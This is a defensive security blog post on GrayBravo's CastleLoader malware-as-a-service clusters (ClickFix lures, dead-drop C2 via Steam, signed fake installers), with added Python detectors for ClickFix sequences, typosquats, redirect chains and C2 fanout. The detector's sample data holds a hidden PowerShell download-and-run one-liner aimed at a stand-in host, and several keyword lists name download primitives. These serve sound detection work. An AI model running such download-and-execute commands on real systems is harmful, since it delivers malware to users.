GrayBravo’s CastleLoader shows how MaaS threats scale. Learn how AI detection spots ClickFix chains, cluster behavior, and anomalous C2 patterns.

AI Detection Lessons From GrayBravo’s CastleLoader
A lot of security teams still treat malware campaigns as single, monolithic “threat actor operations.” GrayBravo (formerly TAG-150) is the opposite: a malware-as-a-service ecosystem where multiple operators run different campaigns, lures, and infrastructure—while sharing a common loader (CastleLoader) and downstream tooling (including CastleRAT and Matanbuchus).
That matters because it changes how you should defend. If your program is optimized to chase one set of indicators at a time, you’ll lose the thread. If you can model behaviors, clusters, and anomalies across email, endpoints, identity, and network—this is where AI in cybersecurity earns its keep.
Below is a practical, operations-focused read of the GrayBravo case: what the clusters tell us, how ClickFix turns user behavior into an exploit path, and what AI-powered detection and response should be doing differently in 2026.
GrayBravo is a “platform,” not a campaign
GrayBravo’s most important trait isn’t the malware family names. It’s the operating model: multiple distinct activity clusters were observed using CastleLoader with different victim profiles and tactics. That’s classic MaaS behavior—one core capability (the loader) and many “customers” (operators) running their own playbooks.
Here’s what that changes for defenders:
- You can’t rely on one cluster’s IoCs to stop the next one. Domains churn. Hosting shifts. The lure theme changes (logistics quotes one week, Booking.com the next).
- The shared layer is the detection opportunity. The loader behaviors, staging patterns, panel traits, and post-exploitation workflows create durable signals.
- Attribution matters less than clustering. Whether Cluster 2 and Cluster 3 share operators is interesting; what matters operationally is whether your controls can spot both.
In the “AI in Cybersecurity” series, I keep coming back to a simple stance: AI is most valuable when it learns the invariants in attacker behavior, not when it memorizes yesterday’s indicators. GrayBravo is a clean case study.
ClickFix: the social-engineering trick that breaks traditional controls
ClickFix attacks don’t “exploit” a vulnerability the way security teams like to imagine. They exploit the user’s willingness to follow instructions.
The pattern seen across GrayBravo-linked clusters is consistent:
- A realistic lure (rate confirmation, guest verification, document signing).
- A landing page that looks routine and time-sensitive.
- A prompt that instructs the user to copy/paste and run a command.
- The command pulls down an archive or script, launches it quietly (often via pythonw.exe), and drops CastleLoader (and then a second-stage payload).
This matters because many security stacks are still strongest at:
- blocking known malicious attachments
- scanning URLs against reputation feeds
- catching macro malware
ClickFix often slips between those layers by shifting the “execution step” into the user’s hands.
What AI should flag in a ClickFix chain
Answer first: AI detection should treat “user copy/paste command execution” as a high-risk behavioral sequence, especially when it’s preceded by an external lure.
Concrete signals to model:
- A browser session followed by a shell launch (powershell.exe, cmd.exe, mshta.exe) within a short time window
- Clipboard patterns that resemble staged commands (long one-liners, encoded blobs, download-and-execute sequences)
- Process trees where pythonw.exe appears unexpectedly on endpoints that don’t normally run Python
- A “decoy message” or fake completion dialog immediately after background execution (common in these campaigns)
This is where ML-based correlation helps more than static rules: individually, each event might be explainable; the sequence is the giveaway.
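The sequence logic described above, as an added example that is not code from the article or from any product it mentions. It runs over a constructed endpoint process log and flags the three signals the list names: a shell starting shortly after browser activity, a command line that looks like a staged download-and-run one-liner, and pythonw.exe on a host with no sanctioned Python use. The 5-minute window, the browser/shell sets, the marker keywords and the sanctioned-host list are assumptions; the same detector also covers step 1 of the detection blueprint further down the page.

```python
"""Sequence detector for ClickFix-style execution chains.

Added example, not code from the article or from any product it mentions.
The endpoint events below are constructed; the 5-minute window, the
browser/shell sets and the sanctioned-Python host list are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "mshta.exe"}
SANCTIONED_PYTHON_HOSTS = {"dev-ws-07"}      # assumption: from the asset inventory
WINDOW = timedelta(minutes=5)                # assumption: browser -> shell gap worth flagging
# Tokens typical of a staged download-and-run one-liner (assumed heuristic).
FETCH_MARKERS = ("iwr", "invoke-webrequest", "downloadstring", "curl ", "-enc", "frombase64string")
RUN_MARKERS = (";", "|", "iex", "start-process", "expand-archive", "pythonw")


@dataclass(frozen=True)
class ProcEvent:
    host: str
    ts: datetime
    image: str      # process image name
    parent: str     # parent image name
    cmdline: str


def browser_to_shell(events, window=WINDOW):
    """Return (host, browser_ts, shell_ts, shell_image) for every shell start
    that follows browser activity on the same host within `window`.
    Each event alone is explainable; the sequence is the signal."""
    hits = []
    by_host = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(e.host, []).append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            if e.image not in SHELLS:
                continue
            for prior in evs[:i]:
                if prior.image in BROWSERS and e.ts - prior.ts <= window:
                    hits.append((host, prior.ts, e.ts, e.image))
                    break
    return hits


def staged_command(cmdline):
    """Heuristic for clipboard-style staged commands: a fetch primitive plus
    either an execution step or an unusually long one-liner."""
    c = cmdline.lower()
    fetch = any(m in c for m in FETCH_MARKERS)
    run = any(m in c for m in RUN_MARKERS)
    return fetch and (run or len(c) > 80)


def unexpected_pythonw(events):
    """Hosts running pythonw.exe that have no sanctioned Python use."""
    return sorted({e.host for e in events
                   if e.image == "pythonw.exe" and e.host not in SANCTIONED_PYTHON_HOSTS})


def findings(events):
    """Combine the three signals into analyst-readable findings."""
    out = []
    for host, b_ts, s_ts, image in browser_to_shell(events):
        gap = int((s_ts - b_ts).total_seconds())
        out.append(f"{host}: {image} started {gap}s after browser activity")
    for e in events:
        if e.image in SHELLS and staged_command(e.cmdline):
            out.append(f"{e.host}: staged download-and-run command in {e.image}")
    for host in unexpected_pythonw(events):
        out.append(f"{host}: pythonw.exe on a host without sanctioned Python")
    return out


T0 = datetime(2026, 1, 15, 10, 0, 0)
# Constructed telemetry: one ClickFix-like chain, one sanctioned Python use,
# and one browser-then-shell pair too far apart to matter.
SAMPLE_EVENTS = [
    ProcEvent("fin-ws-12", T0, "chrome.exe", "explorer.exe", "chrome.exe --profile-directory=Default"),
    ProcEvent("fin-ws-12", T0 + timedelta(seconds=150), "powershell.exe", "explorer.exe",
              'powershell -w hidden -c "iwr http://lure.invalid/pkg -OutFile pkg.zip; '
              'Expand-Archive pkg.zip; pythonw .\\run.py"'),
    ProcEvent("fin-ws-12", T0 + timedelta(seconds=165), "pythonw.exe", "powershell.exe", "pythonw .\\run.py"),
    ProcEvent("dev-ws-07", T0 + timedelta(minutes=20), "pythonw.exe", "code.exe", "pythonw tool.py"),
    ProcEvent("hr-ws-03", T0 + timedelta(hours=1), "chrome.exe", "explorer.exe", "chrome.exe"),
    ProcEvent("hr-ws-03", T0 + timedelta(hours=1, minutes=30), "cmd.exe", "explorer.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for line in findings(SAMPLE_EVENTS):
        print(line)
```

The hr-ws-03 pair is deliberately outside the window: without the time constraint, every user who opens a browser and later a terminal would light up, which is exactly the noise that makes static "browser then shell" rules unusable.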
Four clusters, four lessons for AI-powered defense
Recorded Future’s analysis described four distinct CastleLoader activity clusters. Treat them as four training sets for your security analytics.
Cluster 1 (TAG-160): logistics lures + freight platforms = cyber-physical risk
Answer first: TAG-160 shows how threat actors specialize in one industry’s workflows and then weaponize them.
This cluster impersonated logistics firms, used logistics-themed phishing, and abused freight-matching platforms (DAT Freight & Analytics and Loadlink). The operational insight is bigger than malware delivery: logistics is a sector where access can translate into fraud, shipment rerouting, and real-world loss.
What’s distinctive here:
- Typosquatted and re-registered domains that look like real logistics companies
- Spoofed senders to mimic legitimate workflows
- Lures that reference authentic artifacts (rate confirmations, “Direct Port Entry” forms)
- Use of legitimate services (for example, file hosting and external platforms) to blend in
AI application: build industry-aware baselines.
If you support transportation/logistics clients, your detection models should understand normal rhythms:
- expected sender domains for dispatch, freight quotes, and broker comms
- normal access patterns to freight platforms
- typical document workflow tools used internally
Then look for deviations:
- first-time sender domains that are “near matches” to trusted brands
- new accounts or profile changes on freight platforms
- sudden spikes in outbound connections to newly registered domains following email interactions
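One way to turn the "near match" and newly registered domain deviations into an automatic escalation, as an added example that is not the article's or any vendor's code. It uses a Levenshtein distance on the second-level label to catch typosquats and re-registered brand domains, then escalates only when several weak signals line up on one message (this is also step 3 of the detection blueprint further down the page). The trusted-partner list (placeholders under .example), the 30-day "new domain" threshold, the urgency keywords and the two sample messages are all constructed assumptions.

```python
"""Near-match sender domains plus newly registered domain escalation.

Added example, not code from the article. The trusted-partner list, the
30-day "new domain" threshold, the urgency keywords and the sample messages
are constructed assumptions.
"""
from datetime import date

# Assumption: your tenant's trusted logistics partners (placeholder domains).
TRUSTED_PARTNERS = ["dat.example", "loadlink.example", "acmefreight.example"]
URGENCY_TERMS = ("urgent", "immediately", "within 24 hours", "action required", "rate confirmation")
NEW_DOMAIN_DAYS = 30


def edit_distance(a, b):
    """Levenshtein distance, enough to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(domain):
    """Keep the last two labels (simplification: no public-suffix list)."""
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def near_match(domain, trusted=TRUSTED_PARTNERS, max_dist=2):
    """Return the trusted domain this sender imitates, or None when the sender
    is trusted itself or not close to anything. Second-level labels are
    compared so 'loadlnk.example' and 'loadlink.com' both map to loadlink."""
    reg = registrable(domain)
    if reg in trusted:
        return None
    sld = reg.split(".")[0]
    best = None
    for t in trusted:
        t_sld = t.split(".")[0]
        dist = edit_distance(sld, t_sld)
        # Short brands get a stricter bound: 'dhl' is two edits from 'dat'.
        limit = 1 if len(t_sld) <= 4 else max_dist
        # A long brand embedded in a longer label ('loadlink-dispatch') counts too.
        embedded = len(t_sld) >= 6 and t_sld in sld
        if (dist <= limit or embedded) and (best is None or dist < best[1]):
            best = (t, dist)
    return best[0] if best else None


def escalate(msg, today, seen_senders):
    """Escalate automatically when several weak signals line up on one message.
    msg carries sender_domain, registered (date or None) and subject."""
    reasons = []
    brand = near_match(msg["sender_domain"])
    if brand:
        reasons.append(f"sender domain is a near match for {brand}")
    if msg["sender_domain"] not in seen_senders:
        reasons.append("first-time sender domain")
    if msg["registered"] is not None:
        age = (today - msg["registered"]).days
        if age < NEW_DOMAIN_DAYS:
            reasons.append(f"domain registered {age} days ago")
    if any(term in msg["subject"].lower() for term in URGENCY_TERMS):
        reasons.append("urgent lure language")
    return len(reasons) >= 3, reasons


# Constructed sample data.
TODAY = date(2026, 1, 15)
SEEN_SENDERS = {"dat.example", "loadlink.example", "acmefreight.example"}
SUSPECT = {"sender_domain": "loadlnk.example", "registered": date(2026, 1, 11),
           "subject": "URGENT rate confirmation - sign before pickup"}
ROUTINE = {"sender_domain": "loadlink.example", "registered": date(2015, 6, 1),
           "subject": "Weekly lane report"}

if __name__ == "__main__":
    for m in (SUSPECT, ROUTINE):
        print(m["sender_domain"], escalate(m, TODAY, SEEN_SENDERS))
```

Requiring three aligned signals rather than any one keeps a legitimately new partner or a single urgent subject line from paging the on-call; the registration age would come from WHOIS/RDAP enrichment in a real pipeline.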
Cluster 2 (TAG-161): Booking.com impersonation + “phishing ops tooling” at scale
Answer first: TAG-161 isn’t just phishing—it’s phishing operations engineering.
This cluster used Booking.com-themed lures and ClickFix, delivered CastleLoader and Matanbuchus, and—most telling—ran dedicated email/redirection management panels (with Russian-language titles like “Email Manager” and “Redirect and Email Manager”).
That tells you the operation is optimized for:
- generating unique redirect links at scale
- managing SMTP infrastructure and sending pools
- handling templates, logging, and proxy routing
AI application: detect the infrastructure behavior, not the brand lure.
Brand impersonation rotates endlessly. The redirection mechanics don’t.
What to model:
- high-entropy subdomain patterns used for per-target tracking
- unusual redirect chains that end in script download prompts
- outbound SMTP anomalies from endpoints that shouldn’t send mail
- proxy “fan-out” behavior tied to campaign infrastructure
Also, from a SOC process standpoint: if your team is still manually triaging every “Booking.com email,” you’re playing the attacker’s game. Your automation should collapse all brand-themed variants into one ClickFix/redirect cluster.
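Scoring the redirect mechanics instead of the brand, as an added example (not code from the article or from any tool it names). It measures the Shannon entropy of the leftmost DNS label to spot per-target tracking subdomains, checks whether a chain hops across several hosts, downgrades to plain http or ends in a script/archive download, and then collapses chains with the same mechanics into one group so a Booking-themed and a logistics-themed lure land in the same cluster. The thresholds, suffix list and sample chains are constructed assumptions.

```python
"""Scoring redirect chains by their mechanics rather than the brand they wear.

Added example, not code from the article. The entropy and length thresholds,
the download suffix list and the sample chains are constructed assumptions.
"""
import math
from urllib.parse import urlparse

DOWNLOAD_SUFFIXES = (".ps1", ".hta", ".js", ".vbs", ".zip", ".msi")
TRACKING_MIN_LEN = 12       # assumption: per-target tokens tend to be long
TRACKING_MIN_ENTROPY = 3.5  # bits per character; dictionary words sit well below


def shannon_entropy(s):
    """Bits per character of the label; random-looking tokens score high."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def tracking_label(url):
    """True if the leftmost DNS label looks like a per-target tracking token."""
    host = urlparse(url).hostname or ""
    label = host.split(".")[0]
    return len(label) >= TRACKING_MIN_LEN and shannon_entropy(label) >= TRACKING_MIN_ENTROPY


def chain_score(chain):
    """chain: URLs in redirect order. Returns (score, reasons)."""
    reasons = []
    hosts = [urlparse(u).hostname for u in chain]
    if len(set(hosts)) >= 3:
        reasons.append("hops across three or more hosts")
    if any(tracking_label(u) for u in chain):
        reasons.append("high-entropy tracking subdomain")
    if urlparse(chain[-1]).path.lower().endswith(DOWNLOAD_SUFFIXES):
        reasons.append("terminates in a script or archive download")
    if any(urlparse(u).scheme == "http" for u in chain[1:]):
        reasons.append("downgrades to plain http mid-chain")
    return len(reasons), reasons


def collapse_by_mechanics(chains):
    """Group chains that share mechanics regardless of lure brand, so the SOC
    sees one redirect cluster instead of a dozen separate brand alerts.
    Returns {reasons tuple: [entry URL, ...]}."""
    groups = {}
    for chain in chains:
        _, reasons = chain_score(chain)
        groups.setdefault(tuple(reasons), []).append(chain[0])
    return groups


# Constructed sample chains: two different lures with identical mechanics,
# and one ordinary same-site redirect.
SUSPECT_CHAIN = [
    "https://k3q9z7m2x5c8v1.mail-track.example/r",
    "https://guest-verify.example/reservation/confirm",
    "http://cdn-files.example/dl/verify.zip",
]
SECOND_LURE = [
    "https://b8n4t1w6y2h5p3.mail-track.example/r",
    "https://rate-confirm.example/doc/sign",
    "http://cdn-files.example/dl/rate.zip",
]
BENIGN_CHAIN = ["https://www.example.com/news", "https://www.example.com/news/today"]

if __name__ == "__main__":
    for key, entries in collapse_by_mechanics([SUSPECT_CHAIN, SECOND_LURE, BENIGN_CHAIN]).items():
        print(len(key), "signals:", entries)
```

Entropy is a coarse but durable feature: operators can rotate brands and hosting daily, but a per-target tracking token has to stay unpredictable, so it keeps looking random.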
Cluster 3: Steam Community as a dead drop resolver
Answer first: Using a legitimate community site as a C2 resolver is a durability tactic, not a gimmick.
Cluster 3 used Booking.com-themed ClickFix, but a notable twist was using Steam Community profiles as a “dead drop” to resolve C2 domains. That gives attackers a flexible update channel without shipping new binaries.
AI application: legitimate internet services (LIS) need contextual monitoring.
Blanket-blocking Steam isn’t realistic for many orgs. Better approaches:
- Flag endpoints that access Steam Community and then initiate unusual outbound C2-like traffic shortly after
- Detect “resolver patterns” where an endpoint repeatedly polls a page and then pivots to new domains/IPs
- Use graph analytics: connect the sequence of (Steam profile → resolved domain → C2 IP) across endpoints
This is one of the strongest examples of why AI-based anomaly detection belongs in network security monitoring. Static allowlists for “popular sites” create blind spots.
Cluster 4: malvertising + fake signed installers
Answer first: Signed malware is a procurement problem as much as a detection problem.
Cluster 4 distributed CastleLoader via malvertising and fake software updates (impersonating tools like Zabbix and RVTools), including electronically signed MSI installers—sometimes with Extended Validation (EV) certificates.
If your users trust “signed = safe,” attackers will keep buying that trust.
AI application: trust scoring must include certificate and distribution context.
Practical signals:
- first-seen signer + first-seen file + downloaded from a non-standard source = high risk
- signed MSI that spawns script interpreters or drops unusual DLLs = high risk
- “fake GitHub repo” patterns: newly created repos, low history, binary releases with installer naming patterns
AI can help here by combining:
- reputation history (signer age, prevalence)
- behavior (process tree, network beacons)
- distribution path (ad click chains, referrers)
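A contextual trust score for signed installers, as an added example that is not the article's or any vendor's code. It combines the three inputs listed above: signer and file reputation (age, prevalence), behaviour (spawned interpreters, unexpected DLLs) and distribution path (ad referrer, non-vendor host), and makes a valid signature, EV or not, contribute nothing on its own. This is also step 4 of the detection blueprint further down the page. The weights, thresholds, ad-referrer markers, placeholder vendor host and the two sample installers are constructed assumptions; a real deployment would feed them from EDR and reputation data.

```python
"""Contextual trust scoring for signed installers.

Added example, not code from the article. Weights, thresholds, ad-referrer
markers and the sample installers are constructed assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

SCRIPT_INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "pythonw.exe"}
AD_REFERRER_MARKERS = ("/aclk", "utm_medium=cpc", "ads.")   # assumption: ad-click telltales
QUARANTINE_THRESHOLD = 6


@dataclass
class Installer:
    name: str
    signer: str
    signer_first_seen: datetime
    signer_prevalence: int      # distinct files seen from this signer
    file_first_seen: datetime
    file_prevalence: int        # endpoints where this hash has been seen
    ev_cert: bool
    referrer: str               # where the download click came from
    source_host: str
    vendor_hosts: tuple         # hosts the product is legitimately served from
    child_processes: tuple = ()
    dropped_dlls: tuple = ()    # DLLs the EDR flagged as outside the product's manifest


def trust_score(inst, now):
    """Return (risk, reasons). Higher risk means less trust; a valid signature
    on its own adds nothing, and EV status does not offset low prevalence."""
    risk, reasons = 0, []
    if now - inst.signer_first_seen < timedelta(days=30) and inst.signer_prevalence < 10:
        risk += 3
        reasons.append("first-seen, low-prevalence signer")
    if now - inst.file_first_seen < timedelta(days=7) and inst.file_prevalence < 5:
        risk += 2
        reasons.append("first-seen, low-prevalence file")
    if inst.source_host not in inst.vendor_hosts:
        risk += 2
        reasons.append("downloaded from a non-vendor host")
    if any(m in inst.referrer for m in AD_REFERRER_MARKERS):
        risk += 1
        reasons.append("ad-driven download path")
    if set(inst.child_processes) & SCRIPT_INTERPRETERS:
        risk += 3
        reasons.append("installer spawned a script interpreter")
    if inst.dropped_dlls:
        risk += 1
        reasons.append("dropped DLLs outside the product's file set")
    if inst.ev_cert and inst.signer_prevalence < 10:
        reasons.append("EV certificate does not offset low prevalence")
    return risk, reasons


def decision(inst, now):
    """Quarantine when the combined context crosses the threshold."""
    risk, _ = trust_score(inst, now)
    return "quarantine" if risk >= QUARANTINE_THRESHOLD else "allow"


# Constructed sample installers; vendor.example stands in for the real vendor host.
NOW = datetime(2026, 1, 15, 9, 0, 0)
FAKE_UPDATE = Installer(
    name="monitoring-agent-setup.msi", signer="Constructed Signer Ltd",
    signer_first_seen=NOW - timedelta(days=3), signer_prevalence=2,
    file_first_seen=NOW - timedelta(hours=6), file_prevalence=1, ev_cert=True,
    referrer="https://ads.example/aclk?id=1", source_host="monitoring-dl.example",
    vendor_hosts=("vendor.example",),
    child_processes=("powershell.exe",), dropped_dlls=("unexpected.dll",),
)
GENUINE = Installer(
    name="admin-tool-setup.msi", signer="Established Vendor",
    signer_first_seen=NOW - timedelta(days=3 * 365), signer_prevalence=4000,
    file_first_seen=NOW - timedelta(days=60), file_prevalence=850, ev_cert=False,
    referrer="https://vendor.example/downloads", source_host="vendor.example",
    vendor_hosts=("vendor.example",),
)

if __name__ == "__main__":
    for inst in (FAKE_UPDATE, GENUINE):
        print(inst.name, decision(inst, NOW), trust_score(inst, NOW)[1])
```

Note that the genuine installer scores zero without an EV certificate while the fake one scores high with one: the certificate is just one attribute, and the signer's history and the download path carry far more information than the signature's validation level.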
What CastleRAT’s infrastructure tells you about attacker maturity
CastleRAT communications showed redundant C2 behavior, including near-simultaneous connections to multiple servers and handshake variations. Operationally, redundancy means attackers expect takedowns and blocking—and they’ve planned around it.
Answer first: When you see deliberate C2 redundancy, incident response must prioritize containment speed over perfect attribution.
AI-powered response can help by:
- auto-grouping related C2 endpoints by protocol similarity and shared cryptographic markers (for example, repeated RC4 key clusters)
- detecting “multi-C2 fanout” as a sign of active control, not leftover beacon noise
- recommending containment actions based on observed playbooks (block + isolate + credential reset) rather than waiting for full malware classification
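Both network patterns, the cluster 3 dead-drop resolver and the CastleRAT multi-C2 fanout, over the same connection telemetry, as an added example that is not the article's or any vendor's code. The first detector looks for a process that repeatedly reads a community page and then, shortly after its last poll, contacts a destination absent from that host's baseline; the second looks for one process opening connections to several distinct destinations within seconds. The connection records, per-host baselines, window sizes, the list of community sites watched and the TEST-NET addresses are constructed assumptions; steamcommunity.com is the site the article names.

```python
"""Dead-drop resolution via a legitimate service, and multi-C2 fanout, over
connection telemetry.

Added example, not code from the article. Records, baselines, windows and the
dead-drop host list are constructed assumptions; IPs are from TEST-NET.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

DEAD_DROP_HOSTS = {"steamcommunity.com"}  # assumption: LIS pages worth watching
MIN_POLLS = 3                             # repeated reads, not a single visit
PIVOT_WINDOW = timedelta(minutes=2)       # new destination soon after the last poll
FANOUT_WINDOW = timedelta(seconds=15)
FANOUT_MIN_DESTS = 3


@dataclass(frozen=True)
class Conn:
    host: str
    ts: datetime
    process: str
    dst: str        # hostname or IP string
    dst_port: int


def _by_process(conns):
    grouped = {}
    for c in sorted(conns, key=lambda c: c.ts):
        grouped.setdefault((c.host, c.process), []).append(c)
    return grouped


def dead_drop_pivots(conns, baselines):
    """Return (host, process, dead_drop, new_dst) when a process polls a
    community site MIN_POLLS+ times and then, within PIVOT_WINDOW of the last
    poll, contacts a destination absent from that host's baseline."""
    hits = []
    for (host, proc), cs in _by_process(conns).items():
        known = set(baselines.get(host, ()))
        for dd in DEAD_DROP_HOSTS:
            polls = [c for c in cs if c.dst == dd]
            if len(polls) < MIN_POLLS:
                continue
            last = polls[-1].ts
            for c in cs:
                if c.dst != dd and c.dst not in known and last <= c.ts <= last + PIVOT_WINDOW:
                    hits.append((host, proc, dd, c.dst))
                    break
    return hits


def multi_c2_fanout(conns):
    """Return (host, process, sorted dsts) when one process reaches
    FANOUT_MIN_DESTS+ distinct destinations inside FANOUT_WINDOW: redundancy
    that looks like active control rather than a stale beacon."""
    hits = []
    for (host, proc), cs in _by_process(conns).items():
        for i, start in enumerate(cs):
            dsts = {c.dst for c in cs[i:] if c.ts - start.ts <= FANOUT_WINDOW}
            if len(dsts) >= FANOUT_MIN_DESTS:
                hits.append((host, proc, sorted(dsts)))
                break
    return hits


# Constructed sample: one unexpected pythonw.exe resolver chain with fanout,
# and the Steam client on a developer box whose destinations are all baseline.
T0 = datetime(2026, 1, 15, 12, 0, 0)
BASELINES = {  # assumption: destinations each host normally talks to
    "ops-ws-02": ["intranet.example", "updates.example"],
    "dev-ws-07": ["intranet.example", "steamcommunity.com", "steamcdn.example"],
}
SAMPLE_CONNS = [
    Conn("ops-ws-02", T0, "pythonw.exe", "steamcommunity.com", 443),
    Conn("ops-ws-02", T0 + timedelta(minutes=5), "pythonw.exe", "steamcommunity.com", 443),
    Conn("ops-ws-02", T0 + timedelta(minutes=10), "pythonw.exe", "steamcommunity.com", 443),
    Conn("ops-ws-02", T0 + timedelta(minutes=10, seconds=20), "pythonw.exe", "upd-sync.example", 443),
    Conn("ops-ws-02", T0 + timedelta(minutes=11), "pythonw.exe", "203.0.113.10", 8443),
    Conn("ops-ws-02", T0 + timedelta(minutes=11, seconds=2), "pythonw.exe", "203.0.113.11", 8443),
    Conn("ops-ws-02", T0 + timedelta(minutes=11, seconds=4), "pythonw.exe", "203.0.113.12", 8443),
    Conn("dev-ws-07", T0, "steam.exe", "steamcommunity.com", 443),
    Conn("dev-ws-07", T0 + timedelta(minutes=1), "steam.exe", "steamcommunity.com", 443),
    Conn("dev-ws-07", T0 + timedelta(minutes=2), "steam.exe", "steamcommunity.com", 443),
    Conn("dev-ws-07", T0 + timedelta(minutes=2, seconds=5), "steam.exe", "steamcdn.example", 443),
]

if __name__ == "__main__":
    print(dead_drop_pivots(SAMPLE_CONNS, BASELINES))
    print(multi_c2_fanout(SAMPLE_CONNS))
```

The developer workstation polls the same site just as often but never leaves its baseline, which is the point of contextual monitoring: the community site is not the signal, the pivot to something new right after reading it is. When both detectors fire on the same process, the containment playbook the section describes (block, isolate, reset credentials) can start before anyone has classified the binary.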
A practical detection blueprint (what I’d implement next)
If you want a concrete, low-drama plan that maps to GrayBravo-style MaaS threats, start here.
1) Build behavior-first detections for ClickFix
- Alert on browser → shell within 2–5 minutes after visiting an external link
- Flag clipboard-to-shell patterns (copy/paste burst + immediate interpreter execution)
- Watch for pythonw.exe execution on endpoints without sanctioned Python usage
2) Add “legitimate service anomaly” monitoring
- Create baselines for Paste sites, community platforms, and file-sharing services
- Alert on rare endpoints initiating those connections followed by new domain beacons
3) Treat newly registered domains as an investigation multiplier
- When email + newly registered domain + urgent lure language align, escalate automatically
- Use fuzzy matching to catch typosquats and re-registered brand domains
4) Make certificate trust contextual
- Score signed installers by signer prevalence, first-seen time, and execution behaviors
- Quarantine or require extra verification for low-prevalence EV-signed installers from ad-driven traffic
5) Cluster incidents, don’t just ticket them
- Build graphs connecting sender identity, landing pages, payload family, and C2 patterns
- Use AI to label clusters (logistics-themed ClickFix, Booking-themed redirect ops, malvertising installers) so the SOC sees campaigns—not noise
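Step 5 of the blueprint as working code, added here as an example rather than code from the article or from any product. Incidents are nodes, a shared sender identity, landing host or C2 pattern is an edge, and connected components (via union-find) become campaigns that are labelled from their dominant lure theme and delivery method. Payload family is deliberately not used as an edge, because the shared loader is exactly what every GrayBravo cluster has in common and would merge everything into one blob. The six incident records and the label table are constructed assumptions.

```python
"""Clustering incidents into campaigns by shared infrastructure.

Added example, not code from the article. The incident records and the label
table are constructed assumptions.
"""
from collections import Counter

LINK_FIELDS = ("sender_domain", "landing_host", "c2_pattern")   # payload is not an edge
LABELS = {  # (lure theme, delivery) -> campaign label; assumption
    ("logistics", "clickfix"): "logistics-themed ClickFix",
    ("booking", "clickfix"): "Booking-themed redirect ops",
    ("software-update", "malvertising"): "malvertising installers",
}


class UnionFind:
    """Disjoint-set forest with path halving; enough for thousands of incidents."""

    def __init__(self, items):
        self.parent = {i: i for i in items}

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_incidents(incidents):
    """Return {campaign label: sorted incident ids}. Two incidents join the
    same component when they share a value in any LINK_FIELDS field."""
    uf = UnionFind([inc["id"] for inc in incidents])
    first_owner = {}                       # (field, value) -> first incident seen with it
    for inc in incidents:
        for field in LINK_FIELDS:
            value = inc.get(field)
            if not value:
                continue
            key = (field, value)
            if key in first_owner:
                uf.union(first_owner[key], inc["id"])
            else:
                first_owner[key] = inc["id"]
    components = {}
    for inc in incidents:
        components.setdefault(uf.find(inc["id"]), []).append(inc)
    result = {}
    for members in components.values():
        theme = Counter((m["lure_theme"], m["delivery"]) for m in members).most_common(1)[0][0]
        base = LABELS.get(theme, f"{theme[0]}-themed {theme[1]}")
        label, n = base, 1
        while label in result:              # distinct components with the same theme
            n += 1
            label = f"{base} #{n}"
        result[label] = sorted(m["id"] for m in members)
    return result


# Constructed incidents: all but one deliver CastleLoader, yet they split into
# three campaigns because the loader is not an edge.
INCIDENTS = [
    {"id": "INC-1", "lure_theme": "logistics", "delivery": "clickfix", "sender_domain": "loadlnk.example",
     "landing_host": "rate-confirm.example", "payload": "CastleLoader", "c2_pattern": "rc4-key-A"},
    {"id": "INC-2", "lure_theme": "logistics", "delivery": "clickfix", "sender_domain": "dat-quotes.example",
     "landing_host": "rate-confirm.example", "payload": "CastleLoader", "c2_pattern": "rc4-key-A"},
    {"id": "INC-3", "lure_theme": "booking", "delivery": "clickfix", "sender_domain": "guest-verify.example",
     "landing_host": "k3q9z7.track.example", "payload": "Matanbuchus", "c2_pattern": "rc4-key-B"},
    {"id": "INC-4", "lure_theme": "booking", "delivery": "clickfix", "sender_domain": "guest-verify.example",
     "landing_host": "m2x5c8.track.example", "payload": "CastleLoader", "c2_pattern": "rc4-key-B"},
    {"id": "INC-5", "lure_theme": "software-update", "delivery": "malvertising", "sender_domain": None,
     "landing_host": "monitoring-dl.example", "payload": "CastleLoader", "c2_pattern": "rc4-key-C"},
    {"id": "INC-6", "lure_theme": "software-update", "delivery": "malvertising", "sender_domain": None,
     "landing_host": "admin-tool-dl.example", "payload": "CastleLoader", "c2_pattern": "rc4-key-C"},
]

if __name__ == "__main__":
    for label, ids in cluster_incidents(INCIDENTS).items():
        print(f"{label}: {', '.join(ids)}")
```

Choosing which fields count as edges is the real design decision: attributes shared by every MaaS customer (the loader, a common packer) belong in the label or the enrichment, never in the graph, or the clustering collapses into "everything is GrayBravo" and tells the SOC nothing it can act on.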
Snippet-worthy truth: MaaS is a scaling model. Your defense has to scale with clustering and automation, or you’ll be doing campaign triage forever.
Where this fits in the “AI in Cybersecurity” series
This GrayBravo case is a sharp reminder of what AI is really for in modern security operations: finding structure in chaos.
When attackers run multiple clusters, swap infrastructure quickly, and mix payloads (CastleLoader, CastleRAT, Matanbuchus, infostealers, RATs), the winning strategy isn’t “more indicators.” It’s better detection primitives—sequence analytics, anomaly detection, graph clustering, and automated containment decisions.
If you’re building or buying AI-powered security tooling, use GrayBravo as your test: can your system detect ClickFix behavior across different lures, correlate dead-drop resolving via legitimate services, and surface cluster-level insights fast enough to stop the next wave?
The next question to ask your team is simple: are you still defending endpoints one alert at a time, or are you defending the business by disrupting attacker workflows?